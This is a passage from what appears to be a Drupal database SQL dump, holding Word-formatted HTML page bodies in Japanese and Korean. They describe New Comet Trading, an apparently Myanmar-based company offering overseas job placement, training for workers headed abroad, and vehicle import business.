Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">では韓</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">国</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">の造船所で</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">働</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">きたいミャンマ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">全</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">国</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">から民族問わず、シンマライ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">湾</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">岸で</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">経験</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">豊富な先生達の元で練習を重ねた</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">研</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">修をしていただき、仕事紹介をしております。</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT, JFT, NAT-TEST,<span style=\"mso-spacerun:yes;\">&nbsp; </span>TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 161, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 